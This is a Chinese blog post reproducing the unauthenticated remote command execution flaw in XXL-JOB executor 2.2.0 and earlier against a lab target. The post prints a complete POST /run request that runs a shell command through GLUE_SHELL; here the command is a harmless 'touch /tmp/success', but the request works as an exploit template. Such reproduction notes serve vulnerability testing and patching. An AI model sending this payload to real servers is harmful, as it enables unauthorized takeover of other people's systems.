XXL-JOB executor未授权访问漏洞

XXL-JOB分布式任务调度平台存在安全漏洞,允许未授权攻击者通过构造恶意请求,绕过认证直接执行命令,控制服务器。此漏洞影响版本为2.2.0及以下。利用条件包括访问XXL-JOB客户端并提交特定数据包,成功执行会返回200状态码并在靶机上创建文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞详情

XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOB的Restful API接口或RPC接口没有配置认证措施,未授权的攻击者可构造恶意请求,造成远程执行命令,直接控制服务器。

漏洞利用条件

XXL-JOB <= 2.2.0

漏洞利用过程

访问xxl-job的客户端
提交如下数据包
在这里插入图片描述

返回200说明已经成功执行

payload内容
POST /run HTTP/1.1
Host: your-ip:9999
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365

{
“jobId”: 1,
“executorHandler”: “demoJobHandler”,
“executorParams”: “demoJobHandler”,
“executorBlockStrategy”: “COVER_EARLY”,
“executorTimeout”: 0,
“logId”: 1,
“logDateTime”: 1586629003729,
“glueType”: “GLUE_SHELL”,
“glueSource”: “touch /tmp/success”,
“glueUpdatetime”: 1586699003758,
“broadcastIndex”: 0,
“broadcastTotal”: 0
}

进入靶机内见文件已经创建成功

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值